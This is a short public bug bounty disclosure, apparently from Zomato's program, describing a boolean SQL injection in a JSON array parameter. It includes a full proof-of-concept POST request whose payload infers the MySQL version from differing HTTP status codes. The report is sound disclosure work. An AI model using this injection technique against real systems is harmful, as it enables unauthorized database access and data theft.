[www.zomato.com] Boolean SQLi - /███████.php
Team Summary
Official summary from Zomato
@gerben_javado found that the parameter brids (which was a JSON array) was vulnerable to boolean SQL injection. ##POC Requesting MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5 (hex == @@version) resulted in a 500 HTTP status and MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/4 resulted in a 200 HTTP status. Showing that the version of MySQL starts with a 5. ``` POST /████.php?res_id={RES_ID} HTTP/1.1 Host: www.zomato.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID={SESSION_COOKIE}; Content-Type: application/x-www-form-urlencoded Content-Length: 102 action=show_support_breakups&brids=["')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/%23"] ``` Thanks @gerben_javado for helping us in keeping @zomato secure :)
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Submitted
Weakness
SQL Injection